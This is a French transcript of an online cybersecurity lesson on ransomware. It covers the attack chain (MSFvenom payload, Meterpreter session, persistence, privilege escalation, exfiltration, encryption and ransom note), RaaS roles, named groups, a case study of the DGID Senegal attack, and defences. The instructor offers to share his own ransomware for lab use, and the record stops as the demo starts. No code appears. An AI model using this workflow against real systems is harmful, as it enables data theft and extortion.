Bonsoir à tous, bonsoir ABD, bonsoir Bala. Bon, je crois qu'on peut démarrer la séance. Peut-être que les autres vont nous prendre en route. Donc, on peut commencer. Euh, Aujourd'hui, donc, j'ai prévu de faire un TP sur les ransomware. Donc, on va voir de manière théorique ce que ça veut dire. Ensuite, on mettra en place un cas pratique. Donc, où, dans un premier temps, on va prendre le contrôle d'une machine à distance. Donc, comme on l'a toujours fait ici, donc, comment créer un fichier malveillant avec MSF Venom, l'envoyer à la cible, prendre le contrôle de sa machine. Donc, ainsi, une fois donc qu'on a pris le contrôle, on va essayer de cibler quels sont les dossiers et fichiers qui sont sensibles et on va essayer de les chiffrer. Donc, c'est ça le rôle des ransomware. Donc, dans un premier temps, on peut faire de l'exfiltration. Donc, on verra ça au niveau de la présentation PowerPoint. Donc, parce que en attaquant, dès qu'il se connecte, dès qu'il a donc un accès sur ta machine, ce qu'il fait en premier, c'est d'abord de faire de l'escalade des privilèges. Donc, comme on l'a vu la dernière fois, donc faire de l'escalade des privilèges. Ensuite, faire un maintien d'accès. Donc, une fois ce maintien d'accès fait là, c'est-à-dire la persistance, quoi. Donc, ça veut dire qu'il crée un backdoor qui va lui permettre de revenir sur la machine autant de fois qu'il voudra. Mais ensuite, qu'est-ce qu'il peut faire? Il peut cibler tout ce qu'il y a comme fichier et dossier secret, faire une exfiltration d'abord, c'est-à-dire les télécharger sur sa machine. Donc, il peut utiliser ces données pour les vendre au niveau du Darknet. Ensuite, il peut mettre en place un ransomware pour demander une rançon. Donc, l'objectif sera de chiffrer l'ensemble des fichiers et dossiers critiques sur la machine compromise et ainsi donc laisser une note pour demander, demander une rançon. Ainsi, lorsque la cible voudra récupérer ces informations-là, il sera obligé donc de suivre les instructions données par l'attaquant. Donc souvent, l'attaque, lorsque c'est effectué, l'attaquant laisse là-bas un fichier note.txt qui contient plusieurs informations. Donc, les informations sur comment contracter donc la cible. C'est ça que le fichier note.txt contient souvent. Donc, ensuite, une fois que la cible a pris donc connaissance de ce fichier-là, il ouvre, donc il trouvera certainement une adresse mail pour voir comment contacter donc l'attaquant. Donc, dès qu'il contacte l'attaquant, souvent l'attaquant va lui demander une rançon pour lui envoyer donc le fichier de déchiffrement. Donc, la rançon souvent c'est payé en Bitcoin, une crypto-monnaie, de telle sorte que bon, ça sera pas traçable, vous pourrez pas savoir exactement qui est derrière cette attaque. Donc, c'est l'objectif des ransomware. Maintenant, bon, souvent, ce qu'on conseille à ceux qui subissent donc cette attaque, c'est de ne pas payer parce que vous n'êtes pas sûr à 100% lorsque vous payez la rançon que vous allez recevoir des fichiers de déchiffrement. Tout dépendra donc. Tout dépendra donc. Attendez-moi, monsieur. Oui, Vous voilà. avez partagé votre écran ou bien vous expliquez comme ça? Non, non, j'ai pas encore partagé. Ah, d'accord, ok. Mm, ok. Donc, tout dépendra donc de l'attaquant. Donc, il peut, par exemple, vous demander encore le double de ce que vous avez envoyé. Même si vous envoyez le double aussi, vous n'êtes pas sûr à 100% qu'il va vous envoyer les fichiers de déchiffrement. Donc, c'est pourquoi ce qui est conseillé pour les personnes qui subissent ces attaques-là, c'est souvent d'avoir des sauvegardes externes. Donc, ça va vous permettre, une fois lorsque vous subissez ces attaques, donc de tout supprimer et faire une restauration de vos données. Donc, c'est ça qui est conseillé. Mais on vous déconseille de payer parce que, comme je l'ai dit tantôt, vous n'êtes pas sûr à 100% que vous allez recevoir le fichier qui va vous permettre de déchiffrer vos données. Donc, on va passer à la présentation. On passe à la présentation PowerPoint avant de passer à la pratique. Donc,
faut noter que le ransomware qu'on va utiliser, donc c'est un ransomware que j'avais créé dans le but d'une démonstration sur vidéo, donc, que je voulais mettre au niveau de ma chaîne. Parce que j'avais quelqu'un qui avait subi donc ce type d'attaque-là. Lorsqu'il m'en a parlé, donc il m'a envoyé donc les fichiers chiffrés, etc. Je lui ai dit automatiquement que ça, c'est une attaque par ransomware. Donc c'est par là que m'est venue l'idée donc de créer un ransomware et de faire une démonstration donc sur cette attaque-là au niveau de ma chaîne. Donc, un instant, j'arrive. Excusez-moi, on continue. Donc, on peut d'abord faire un tour au niveau de la vidéo avant de continuer. Donc, c'est bon encore. Donc, sur vidéo ici, je l'ai fait, je crois qu'il y a un an de cela. Ça est là. Voilà. Donc, ce sont ces techniques-là qu'on va reproduire ici au niveau de cette séance pratique. Ensuite, je vais vous envoyer le ransomware. Comme ça, avec les fichiers, comme ça, vous allez pouvoir donc reprendre ça au niveau de votre laboratoire. Donc, on passe à la présentation PowerPoint. Donc ici, on va parler des attaques par ransomware. Donc, vous allez comprendre, prévenir et réagir donc face à la menace numéro 1 donc en cybersécurité. Donc ici, l'étude de cas donc va inclure aussi le cas de la DGID, la Direction générale des impôts et des domaines du Sénégal, qui avait subi cette attaque en octobre 2025. Donc on va en parler un peu. Ici, donc ce que nous allons couvrir au niveau de cette présentation, c'est ça. D'abord, on verra l'anatomie donc d'un ransomware. Deuxièmement, donc on verra la chaîne d'attaque. Troisièmement, on va parler de l'écosystème et des acteurs. Quatrièmement, donc on va parler de l'impact de ces attaques-là. Ensuite, on verra donc une étude de cas qui concerne, comme je l'ai dit tantôt, la DGID qui avait subi cette attaque en octobre 2025. Et sixièmement, on verra donc tout ce qui est défense et réponse. D'abord, qu'est-ce qu'un ransomware? Donc, un ransomware, donc c'est appelé rançongiciel en français. Donc, c'est un logiciel malveillant. C'est un logiciel malveillant qui chiffre les fichiers ou bloque l'accès à un système qui exige le paiement d'une rançon en échange donc de la clé de déchiffrement. Donc voici les étapes donc que prend donc un ransomware. D'abord, il y a tout ce qui est chiffrement hybride. Donc ici, vous pouvez utiliser tout ce qui est protocole de chiffrement tel que AES pour les fichiers rapides, le RSA ou /SCC pour protéger donc la clé de déchiffrement. Donc ici, une fois donc le ransomware exécuté, il y a une note de rançon qui est mise sur un fichier note, comme je l'ai dit tantôt. C'est un fichier texte, donc au fond d'écran déposé sur chaque répertoire chiffré. Donc c'est un fichier qui contient, comme je l'ai dit tantôt, des informations sur l'attaquant. Donc ça vous permet de pouvoir entrer en contact avec l'attaquant. Donc une fois que vous entrez en contact avec l'attaquant, c'est maintenant l'étape du paiement. Il va vous dire que vous allez payer la rançon de telle manière. Donc, généralement, c'est exigé en crypto-monnaie, comme je l'ai dit tantôt, Bitcoin. Donc, sous un délai. Donc, il vous dit que vous payez la rançon d'ici, par exemple, 48 heures, 112 heures, etc. Sinon, donc, vous allez perdre vos données et je vais divulguer donc vos données sensibles sur le Darknet. Il y a aussi la cible, donc tout ce qui est poste individuel, serveur, sauvegarde et infrastructure critique. Maintenant, anatomie d'un ransomware. Donc, c'est une menace en constante évolution. Donc, en 1989,
on avait donc la IDS Trojan. Donc, c'est le premier ransomware documenté diffusé par disquette. En 2013, donc, on a le CryptoLocker. Donc, il faisait donc du chiffrement RSA 2048 qui a été popularise donc le paiement en crypto-monnaie. Ensuite, en 2017, on a vu naître le ransomware le plus connu, je peux dire, WannaCry, donc notre PTA. Donc, c'est une propagation en vers via donc Eternal Blue. Donc, Eternal Blue, c'est une faille qui touche tout ce qui est système 7 et 8. Donc, si vous avez un système 7 et 8 qui n'est pas patché, probablement vous avez cette faille-là. Donc, si vous avez cette faille, l'attaquant donc peut, par exemple, prendre le contrôle de votre machine sans pour autant passer par toutes ces étapes-là qu'on fait, c'est-à-dire créer un fichier malveillant, envoyer à la cible, il exécute, ensuite on prend le contrôle de sa machine. Donc toutes ces étapes-là ne seront pas nécessaires lorsque vous avez la faille Ethernet Blue. Pourquoi? Parce que il y a un exploit direct sur Metasploit qui permet, par exemple, en fournissant uniquement le ROS, c'est-à-dire l'adresse IP de la machine cible, de prendre le contrôle donc de la machine à distance sans pour autant se fatiguer. Donc en 2019-2020, il y a aussi le ransomware Mads, donc qui invente la double extorsion, chiffrement puis fuite de données. Et en 2021, donc on a le RAAS, donc industrialisé, donc le Lockbit, le Black Cat, etc., modèle économique organisé. Donc ici, le WannaCry, le ransomware le plus connu, c'est WannaCry, donc qui utilise la vulnérabilité Ethernet Blue. Les quatre grandes familles maintenant. Donc on a les crypto ransomware, on a le lock ransomware, on a le wiper déguisé, et on a le doxware et les leaksware et les leakware. Donc pour les crypto ransomware, donc ils chiffrent les fichiers de la victime, tout ce qui est document, base de données, et laissent donc le système accessible. Donc exemple ici on a le lockbit, on a le clock, on a deuxièmement le lock ransomware. Donc lui, qu'est-ce qu'il fait? Donc il verrouille l'accès complet au système ou à l'écran sans forcément chiffrer les fichiers. Donc ici, on a comme exemple le WinLocker. Troisièmement, donc on a le wiper déguisé. Donc ça fait passer donc pour un ransomware, mais détruit les données sans possibilité réelle de récupération. Bon, ça, c'est un ransomware, on peut dire méchant. Donc on a exemple ici le notre PTA. On a quatrièmement le doxware ou leakware. Donc c'est une menace de publier des données volées plutôt que de simplement les chiffrer. Donc ici on parle d'une extorsion pure. Donc maintenant on passe de l'intrusion à l'extorsion. Donc pour pouvoir faire une attaque par ransomware, d'abord il faudra avoir un accès initial. Donc il faudra pouvoir accéder à la machine pour pouvoir faire donc exécuter donc ton ransomware. Donc c'est ça qu'on va voir ici au niveau du TP. Nous on va utiliser notre technique habituelle, c'est-à-dire créer un fichier malveillant, le transférer à la cible, attendre qu'il exécute ce fichier et on prend donc le contrôle de sa machine à distance. Donc ici on a l'accès initial. Donc ici, ça peut être par phishing, ça peut être par un RDP, donc ça veut dire Remote Desktop Exposé, une exploitation d'une vulnérabilité. Donc là, on peut utiliser ces techniques-là pour avoir un accès initial sur la machine. Deuxièmement, on a exécution et la persistance. Donc ici, comme on l'a vu la dernière fois, dès que vous avez un accès, vous pouvez par exemple faire de la persistance, c'est-à-dire faire de telle sorte que vous allez pouvoir revenir sur la machine autant de fois que vous voudrez. Donc ici, ça peut se faire via le déploiement d'un payload ou bien, comme on l'a vu l'autre fois avec Linux, via les tâches planifiées ou bien des clés de registre. Maintenant, troisièmement, on a tout ce qui est escalade et latérale. Donc, ça veut dire l'escalade des privilèges ou tout ce qui est mouvement latéral.
Donc ici, c'est l'élévation des privilèges, tout ce qui est reconnaissance, mouvement latéral AD, etc. Donc ces techniques-là, on ne les a pas encore vues. Je ne sais pas si on aura le temps de le faire. Comment faire de l'escalade des privilèges lorsque vous avez un accès initial sur une machine. Parce que souvent, vous arrivez sur la machine en tant qu'utilisateur simple et on sait tous que l'utilisateur simple n'a pas tous les droits. Là, il sera limité, quoi. Il ne pourra pas exécuter donc toutes les commandes. Donc, pour avoir donc tous les privilèges sur Linux, donc le super utilisateur c'est root, sur Windows donc c'est autorité intersystème. Maintenant, pour arriver en tant que ces utilisateurs-là, il faudra faire ce qu'on appelle une escalade de privilèges. Pour cela, il y a plusieurs techniques qui existent, surtout sur Linux. Donc, on a tout ce qui est bit SUID activé, tout ce qui est sudoers, tout ce qui est cron tab. Donc, ça permet donc de faire ce qu'on appelle de l'escalade de privilèges. Peut-être qu'on aura le temps donc de faire une séance pratique là-dessus. Quatrièmement, il y a tout ce qui est exfiltration. Donc, dès l'instant que vous avez un accès initial, créez la persistance pour revenir sur la machine autant de fois que vous voulez. Ensuite, vous escaladez votre privilège pour devenir super utilisateur sur la machine. Et là, vous allez pouvoir passer à l'exfiltration des données. Donc, vous allez cibler tout ce qui est données sensibles sur la machine. Et là, vous allez les télécharger sur votre machine avant de continuer. Donc, vous pouvez downloader tout ce qui est fichier sensible sur votre machine. Comme ça, vous aurez ça en local d'abord. Donc, ça peut se faire aussi via un serveur CD. Mais dès l'instant que vous avez donc accès sur la machine cible, donc là, vous allez pouvoir, donc à partir, si c'est un accès interpréteur par exemple, vous allez pouvoir utiliser donc la commande download et télécharger tout ce que vous voulez comme fichier sur votre machine en local. Maintenant, dès l'instant que vous avez téléchargé tout ce que vous voulez comme fichier, donc là, vous pouvez passer au chiffrement. Donc, vous téléchargez les fichiers sur votre machine, ensuite vous les chiffrez pour la victime. Donc, vous chiffrez les fichiers de la victime de telle sorte que lui, à son niveau, il ne pourra plus avoir accès à ces fichiers-là. Et toi, en local, tu as téléchargé les fichiers au niveau de ta machine. Donc, lui, il ne pourra plus accéder, mais toi, tu auras les fichiers sur ta machine Kali. Mais lui, il ne pourra plus accéder à ces fichiers de manière claire. Pourquoi? Parce que les fichiers sont chiffrés. Maintenant, dès l'instant qu'il voudra récupérer donc ces fichiers en clair, il sera obligé d'entrer en contact avec toi. Donc, s'il n'a pas fait donc de sauvegarde. Donc, c'est là où vient donc la sixième partie qui est l'extorsion. Donc, c'est une note de rançon plus menace de publication sur un site de fuite. Donc, dès l'instant que vous avez donc dès l'instant que vous avez chiffré les fichiers, là, vous allez laisser là-bas un fichier note.txt, donc qui contient donc toutes les informations vous concernant. Donc, si vous êtes l'attaquant, par exemple, vous pouvez mettre une adresse mail là-bas qui va permettre donc à la cible de vous contacter une fois qu'il a accès donc à cette adresse mail-là. Il pourra entrer en contact avec vous. Donc, et là, vous allez lui dire, donc, vous allez faire le paiement de cette manière-là. Souvent, comme je l'ai dit tantôt, ça sera en crypto-monnaie. Mais comme je l'ai dit aussi, donc, faut jamais payer lorsque vous subissez ces attaques, parce que comme je l'ai dit tantôt, ce n'est pas sûr à 100% que vous allez recevoir vos fichiers, même si vous payez la rançon. Donc, la personne qui est derrière, vous la connaissez pas. Vous n'avez aucune garantie que lorsque vous allez payer la rançon, vous allez recevoir le fichier de déchiffrement. Donc, comme je l'ai dit tout à l'heure, ce qui est privilégié, c'est de faire des sauvegardes externes, de telle sorte que lorsque vous subissez ces attaques-là, vous allez donc formater votre serveur, on peut dire, entre guillemets, et là, faire une restauration de toutes vos données à partir des sauvegardes que vous avez de manière externe. Maintenant, les principaux vecteurs d'infection de cette attaque. Donc là, ça peut passer par le phishing, comme je l'ai dit tantôt, via un pièce jointe piégé, par exemple, ou bien un macro office qui va permettre de prendre le contrôle de la machine une fois exécuté sur la machine cible. On a tout ce qui est lien malveillant, donc ciblant un employé précis. On a aussi le RDP mal sécurisé, lorsque votre bureau à distance est exposé sur Internet, donc souvent compromis par force brute ou identifiant volé. Donc ça aussi, ça peut faire partie des vecteurs d'infection.
Il y a aussi la vulnérabilité exploitée. Donc, si vous avez une vulnérabilité, vous avez un système qui comporte une vulnérabilité, par exemple. Donc là, qui n'est pas patché, une vulnérabilité non patchée. Donc là, l'attaquant peut passer par cette vulnérabilité pour avoir donc un accès initial sur votre machine. Et dès l'instant qu'il a un accès initial sur votre machine, là, bon, le tour est joué, quoi. Il pourra faire donc du ransomware. Il y a aussi le supply chain, donc qui est la compromission d'un fournisseur logiciel ou d'un partenaire IT pour atteindre donc plusieurs victimes. Il y a aussi un initial access broker, donc c'est l'achat d'accès déjà compromis sur des forums criminels du moins. Donc l'affilié donc RAAS n'a plus donc qu'à déployer donc ce ransomware. Donc ici, par exemple, il y a des attaquants qui peuvent avoir accès donc sur votre machine et dès l'instant qu'ils créent la persistance comme on l'a fait la dernière fois, ils pourront revenir sur votre machine autant de fois qu'ils veulent. Et là, ils pourront donc même vendre cet accès-là à une autre personne qui pourra donc l'utiliser pour exécuter son ransomware. Donc, on a la double ou bien la triple extorsion ici. Donc, les groupes modernes ne se contentent plus de chiffrer. Ils volent les données avant de chiffrer les données pour maximiser donc la pression sur la victime. Donc, ici, on a d'abord le chiffrement. Les fichiers et systèmes sont rendus inaccessibles. La victime ne peut plus opérer. Deuxièmement, donc, on a le vol de données, l'exfiltration préalable des données sensibles, menace donc de publication, même si la victime restaure ses sauvegardes. Donc là, c'est pourquoi ici on parle de double, voire même de triple extorsion. Parce que ici, normalement, le vol de données devrait venir en premier, ici. Donc, on vole d'abord les données, ensuite on chiffre les données de la victime, de telle sorte que ces données-là, même comme il a dit ici, si vous faites une restauration de vos données, sache que donc l'attaquant pourra en même temps vendre ces données-là sur le darknet. Même si tu as des sauvegardes externes et que tu décides de ne pas payer la rançon, parce que l'attaquant, lui, de son côté, a récupéré donc les données et il pourra les vendre au niveau du darknet. Donc, il y a aussi troisièmement, donc la pression étendue. Donc, il y a un contact direct des clients ou partenaires de la victime. Donc, campagne de DDoS, donc déni de service distribué, ou dénonciation médiatique pour forcer donc le paiement. Tout ça sont des techniques de pression que l'attaquant pourra faire pour faire payer donc la rançon et ainsi donc gagner de l'argent, quoi, parce que c'est pas sûr, comme je l'ai dit tantôt, qu'il va vous donner donc le fichier de déchiffrement. Maintenant, on va parler du ransomware as a service, RAAS, du moins. Donc, le ransomware est devenu donc un modèle économique organisé. Les développeurs louent leur outil à des affiliés, par exemple, qui mènent donc les attaques en échange d'un partage des gains. Donc ici, l'opérateur ou le développeur conçoit donc le ransomware, c'est-à-dire l'infrastructure de paiement et le site de fuite, donc perçoit environ donc 20 à 30% de sa rançon. Deuxièmement, on a les affiliés. Les affiliés, qu'est-ce qu'ils font? Eux, ils louent l'outil, mènent l'intrusion et le déploiement, perçoit environ 70 à 80% de la rançon versée. On a aussi donc les Initial Access Brokers, IAB, donc qui vont donc les accès déjà compromis, c'est-à-dire identifiant VPN, etc., aux affiliés, donc sans participer à l'attaque elle-même. Et quatrièmement, on a les négociateurs. Donc, qu'est-ce qu'ils font? Ils gèrent la communication avec la victime pour maximiser le paiement, parfois un rôle spécialisé donc au sein du groupe. Maintenant, on va parler de les panoramas donc des groupes majeurs. Donc, ce sont des groupes qui sont bien connus pour tout ce qui est attaque par ransomware. Donc, on a Lockbit. Donc, période, ils ont commencé en 2019 jusqu'à présent. Donc, méthode de notable ici. Ils utilisent donc le RAAS, donc le plus prolifique, chiffrement très rapide aussi. Donc, les cibles sont donc les multisectoriels.
multisectoriel et mondial aussi. Ils ont des cibles mondiales. Donc, il y a aussi les Black Cat et Alpha. Donc, eux, c'est entre 2021 et 2024. Donc, tout ce qui est méthode de notable, ils écrivent donc en Rust, triple l'extorsion, donc site de fuite publique, etc. Donc, le cible, c'est la santé, l'énergie, finance. On a aussi les Conti, 2020 à 2022, structure quasi donc corporate. Donc, tout ce qui est au niveau des méthodes notables, ils utilisent donc des structures quasi corporate. Donc, il y a aussi une fuite interne de son manuel. Et les cibles notables, ce sont les administrations et la santé aussi. On a le CLOP ici, donc c'est de 2019 jusqu'à présent. Donc pour les méthodes notables, ils utilisent donc ils font donc une exploitation de vulnérabilité 0D. Donc on verra ça tout à l'heure. Move it ou go anywhere. Donc ici, leurs cibles, ce sont les grandes entreprises, chaînes logistiques, etc. On a aussi les Black Shrantak. Donc ce sont eux qui avaient donc attaqué la DGID. Donc ici, leur période, c'est de 2025 jusqu'à présent. Méthode notable, ce sont des acteurs donc récents, double extorsion, ciblage d'administration, etc. Donc cible notable, on a l'Inde, la Turquie, le Sénégal, cas de la DGID. Donc le cas de Black Shrantak donc fait l'objet d'une étude détaillée dans la section suivante. Maintenant, le coût réel d'une attaque par ransomware. Donc ici, d'abord, on a le financier, l'opérationnel, le récupérationnel, le juridique et réglementaire. Donc ici, pour le financier, la rançon éventuelle plus coût de remédiation, perte de chiffre d'affaires pendant l'arrêt d'activité. Donc ici, deuxièmement, pour l'opérationnel, il y a une paralysie des systèmes critiques. Il y a aussi un arrêt donc de la production ou des services pendant des jours, parfois des semaines. Donc, troisièmement, on a le réputationnel. Donc, on a une perte de confiance des usagers, clients et partenaires. Couverture donc médiatique négative durable. Quatrièmement, donc, on a le juridique et le réglementaire, fuite de données personnelles, obligation de notification, sanctions contentieuses potentielles. Donc ici, en chiffres, on peut dire que 21 jours, donc durée moyenne d'interruption d'activité après une attaque par ransomware, plus 90% donc des attaques touchent désormais aussi les sauvegardes. On a donc moins de 65% des données récupérées même après paiement de la rançon. Donc, ce qui veut dire que, comme je l'ai dit tantôt, c'est pas sûr de payer. Même si vous payez, c'est pas sûr de recevoir donc vos données. Donc, parce que vous n'avez pas la mainmise sur celui qui a fait l'attaque. Donc, si vous payez aussi, vous savez pas où se trouve. Donc, il peut par exemple vous demander le double de ce que vous avez payé. Et là, vous n'aurez pas le choix. Si vous payez le double aussi, vous n'êtes pas sûr qu'il va vous envoyer le fichier de déchiffrement. Il peut vous demander le triple, par exemple, et ainsi de suite. Donc, c'est pourquoi on vous interdit de payer lorsque vous subissez une attaque par ransomware. Maintenant, on va parler un peu de la Direction générale des impôts et domaines, donc qui avait subi cette attaque avant de passer à la partie pratique. Donc ici, une administration fiscale nationale paralysée par le groupe Black Shrantak, une chronologie mécanique de l'attaque et enseignement. Donc ici, on va parler de la chronologie des faits. Donc ici, le 2 octobre 2025, communiqué officiel. Donc la DGID annonce une indisponibilité de ses services en ligne, donc lié à un problème technique identifié, donc sans mentionner de cyberattaque. Début octobre 2025, on a une paralysie totale, donc aucun service digitalisé ne fonctionne. Le site de dgid.sn reste inaccessible, hormis sa page de garde, faute d'indisponibilité du serveur. Donc, entre le 3 et le 4 octobre 2025, il y a la revendication publique de l'attaque. Maintenant, le groupe Black Shrantak revendique l'attaque et exige donc une rançon. Les experts, dont Clément Domingo, etc., donc décrivent une situation confuse et évolutive. Maintenant, le 4 octobre 2025, donc on parle de
de surenchère ici. Donc, le groupe renvoie ses exigences financières à la hausse, donc en pleine négociation, donc alimentant l'incertitude sur l'issue de la crise. Donc, comme je l'ai dit tantôt, ici, vous avez vu qu'ils ont vu donc les exigences financières à la hausse ici. Donc, rien ne garantit que même si la DID, donc, ou bien l'État avait décidé de payer ce qu'ils demandent comme rançon, ils vont recevoir le fichier de déchiffrement. Donc, il n'y a rien qui garantit ça. Vous pouvez payer ça et ils vous demandent le double ou bien le triple. C'est pourquoi il ne faut jamais payer. Donc, la semaine suivante, donc, c'est le silence institutionnel. Donc, il y a plus d'une semaine après les faits, les responsables de la DZID restent silencieux malgré donc la paralysie persistante des systèmes de recouvrement. Maintenant, l'attaque en détail. Ici, on a le groupe Black Shantak ici, Black Shantak. Donc, leur nom, c'est un peu difficile à prononcer. Donc, ici, acteur de ransomware relativement récent, opérant selon donc le modèle de la double extorsion. Avant de viser le Sénégal, le groupe avait déjà donc revendiqué des attaques en Inde et en Turquie. Donc, la DZID constitue donc sa cible africaine la plus médiatisée. Donc ici, mode opératoire de ce groupe-là. Donc, il y a une intrusion dans le système de gestion fiscale, et de recouvrement de la DZID. Ensuite, exfiltration des données avant chiffrement. Donc, comme je l'ai dit tantôt, il exfiltre les données avant de les chiffrer. Donc, schéma de la double extorsion. Donc, chiffrement des plateformes rendant donc les services indisponibles et diffusion donc d'un échantillon de données pour prouver l'intrusion et faire donc pression. Voici donc la chronologie de l'attaque. Maintenant, en chiffre clé, c'était quoi? On avait perdu 1 Tera de données exfiltrées. Donc, il y a tout ce qui est rapport financier, documents légaux, identité administrative, etc. On avait aussi perdu 6,5 milliards de francs CFA, donc 10 millions d'euros exigés donc en rançon, donc montant revu à la hausse pendant la négociation. Bon, on ne sait plus trop si l'État avait payé ou pas, donc il n'y avait pas de communiqué sur ça. On ne savait pas si ils ont cédé et payé à la rançon. Ça aussi, jusqu'à présent, bon, moi, je n'ai pas des informations là-dessus. Donc, c'est le schéma de la double extorsion ici, chiffrement des systèmes, plus menace de publication des données volées. Donc, ici, c'est ça. Bon, la menace de publication de données volées, bon, ça, c'est juste une menace comme ça, mais ça ne se passe pas exactement comme ça. L'objectif sera de vendre des données au niveau du Darknet. Donc, vous allez voir quelqu'un qui est intéressé par ces données-là. Donc, là, il va vous payer et vous lui envoyez ces données via le Darknet. Maintenant, les conséquences mises en contexte. Donc ici, impact immédiat d'une attaque par ransomware. Donc il y a paralysie totale des logiciels de gestion fiscale et de recouvrement pendant plus d'une semaine. Donc ça, c'est toujours le cas de la DZID. Donc il y a impossibilité de collecter aussi les impôts et de traiter donc les ordres de paiement, le système fiscal à l'arrêt. Il y a exposition potentielle des contributions à des risques de fraude liés donc aux données administratives volées. Et dernièrement, donc, il y a la perte économique et financière significative pour l'État, difficile donc à chiffrer précisément. Donc maintenant, la partie de série d'attaques contre l'État. Donc ici, on avait aussi avant le trésor public qui était attaqué, donc où il y avait des vols d'ordinateurs contenant des données sensibles quelques mois avant donc l'attaque des EID. Maintenant, on a parlé tout à l'heure de l'attaque des EID, donc où il y avait donc un vol d'un Tera de données, plus une rançon de 6,5 milliards de francs CFA demandés. Donc, on a aussi la DAF où on avait volé 130 gigas de données donc biométriques et électorales, donc exfiltrées par le groupe donc The Green Blood. Donc, il y a aussi Sénégal numérique aussi qui a été donc attaqué via une tentative répétée donc où il y avait donc restriction temporaire du service. Maintenant, la vulnérabilité structurelle et leçon. Donc ici, on va parler de tout ce qui est budget sous-dimensionné, donc fuite des cerveaux numériques.
Il y a aussi absence de retour d'expérience et pour terminer, communication de crise à améliorer. Maintenant, la stratégie de prévention contre ces attaques, c'est quoi? Donc, premièrement, il faudra mettre des sauvegardes 3, 2, 1, immuable. Donc, trois copies de supports différentes, une copie hors ligne. Donc, c'est cette technique-là qu'il faudra appliquer pour donc pouvoir garder vos données. Donc, tester régulièrement aussi la restauration pour voir si on subit par exemple une attaque, est-ce qu'on pourra faire une restauration de nos données. Deuxièmement, faire une segmentation du réseau. Donc, principe du moindre privilège aussi, il faudra l'appliquer sur vos réseaux. Donc, faire de l'isolation des systèmes critiques pour limiter donc le mouvement latéral. Donc, de telle sorte que même si une machine est compromise, l'attaquant ne pourra pas faire donc du pivoting pour aller vers une autre machine. Exiger aussi tout ce qui est authentification multifacteur, MFA, généralisée. Donc, faire une authentification multifacteur sur tous les accès à distance, que ce soit du VPN, du RDP, du SSH, des comptes administrateurs, etc. Donc, tous ces comptes-là, vous devez appliquer une MFA sur ces comptes pour que, même si l'attaquant connaît, par exemple, l'un des identifiants, ne pourra pas connaître les autres identifiants pour pouvoir se connecter. On a aussi, quatrièmement, la gestion des correctifs, donc faire des patch management rigoureux et priorisés, donc en particulier pour les services exposés à Internet. Cinquièmement, donc on a les EDR et les XDR plus les SOC, donc faire une détection et réponse sur les postes des serveurs, donc faire une supervision aussi continue via les IDS, avoir donc des alertes continues de sécurité. Donc, sixièmement, il y a la sensibilisation du personnel, donc qui est très important parce que souvent, c'est le maillon faible du système d'information. C'est eux qui prêtent souvent le flanc et donc donnent accès aux attaquants au système d'information. Donc, il y a tout ce qui est formation régulière au phishing et aux bonnes pratiques avec simulation d'attaque qui doit être faite au niveau donc du personnel. Maintenant, le plan de réponse à un incident ici, donc c'est ceci parti. D'abord, il y a la détection et le confinement. Donc, isoler immédiatement les systèmes touchés du réseau pour stopper donc la propagation. Deuxièmement, faire une analyse forensique. Ça veut dire identifier les vecteurs d'entrée, la portée donc de la compromission et l'exfiltration éventuelle. Donc, ça va permettre de savoir qu'est-ce que l'attaquant a exactement fait sur votre système, même les commandes qu'il a exécutées, donc vous pouvez arriver à les voir. Donc, sixièmement, donc faire une éradication, donc supprimer la présence de l'attaque, tout ce qui est compte compromis, persistance, porte dérobée, etc. Quatrièmement, faire donc une restauration, donc reconstruire depuis des sauvegardes saines et vérifiées, donc jamais donc depuis un système potentiellement compromis. Sixièmement, donc c'est la communication, informer les parties prenantes, aussi les autorités compétentes, etc. Et donc, si nécessaire, le public. Et sixièmement, donc, faire un retour d'expérience, c'est-à-dire documenter l'incident et renforcer donc les contrôles pour éviter donc une récidive, quoi. Donc, ne jamais payer une rançon ici, c'est le notez bien, ne jamais payer une rançon donc sans analyse approfondie, aucune garantie de récupération des données, et cela finance donc l'écosystème criminel aussi. Donc, c'était ça la présentation. Donc, si vous avez des questions, c'est le moment de les poser avant que l'on passe à la partie pratique. Bon, aujourd'hui, on n'a pas beaucoup de monde. C'est pas dû à quoi. Il y a beaucoup d'absents aujourd'hui. Donc, il y a Abdelaziz qui nous a rejoint. Abdelaziz, vous, c'est pas votre premier cours ici. Il y a Alpha aussi qui est arrivé. Donc, mais ABD est parti, il paraît. Vous m'entendez, Abdelaziz, c'est votre premier cours. Moi, je ne me souviens pas de vous avoir vu ici une fois. Abedi dit qu'il a un problème de connexion. Alpha, vous m'entendez? Oui, bonsoir à tout le monde. Oui, Je vous bonsoir. reçois exactement. Désolé pour le retard, j'étais dans la circulation. Bon, Ok. à peu près, j'ai suivi la majeure partie de
de ce thème. D'accord. Bon, de toute façon, il y a l'enregistrement. Ensuite, je vais vous faire parvenir aussi les fichiers au niveau du groupe. Vous allez pouvoir reprendre tout ce qui est théorique. Donc, maintenant, je crois qu'on peut passer à la pratique. Voilà, si c'est bon pour toi. On peut donc Oui, c'est passer bon, à la monsieur. partie pratique. Ok, super. Donc, on passe à la partie pratique de ce TP. D'abord, je vous présente le TP ici, qui est là. Donc, ce sont les attaques par ransomware, ce qu'on venait d'expliquer tout à l'heure, tout ce qui est fonctionnement, etc. Maintenant, ici, dans un premier temps, comme on l'a vu au niveau de la présentation, il faudra avoir un accès initial. Donc, c'est-à-dire compromettre la machine d'abord. Donc, pour cela, ça, ce sont des techniques qu'on a vues ici. Donc, on l'avait fait même la dernière fois, pour tout ce qui est persistance. On avait créé donc, pour la persistance côté Windows, on avait créé donc un fichier malveillant qu'on avait fait parvenir à notre cible. Et là, donc, lorsqu'il exécute, on reçoit une session m'interpréteur. Donc, c'est toujours la même technique ici. On a la session qui est là. Maintenant, ici, dès l'instant qu'on a une session sur la machine cible, donc ça, c'est l'accès initial. Il faudra avoir un accès initial pour pouvoir donc exécuter l'attaque. Donc ici, nous, on va cibler un fichier, un dossier qui s'appelle secret sur la machine Windows. Donc ça, comme on est donc en mode simulation, vous allez créer ce dossier-là. Vous prenez des images, des fichiers PDF, des fichiers Word, etc. Vous mettez dans le dossier. Donc ça vous permet de voir l'impact de l'attaque lorsqu'on va exécuter le ransomware. Comment cela fonctionne exactement. Vous allez voir que les fichiers seront chiffrés et vous n'arriverez plus à pouvoir donc les ouvrir. Donc, c'est ça l'objectif des ransomware. Donc, comme je l'ai dit tantôt, c'est un ransomware que j'avais créé qu'on va utiliser ici pour exécuter l'attaque. Donc, voici le fichier, le dossier donc, qui contient des fichiers extrêmement importants. Ici, donc, 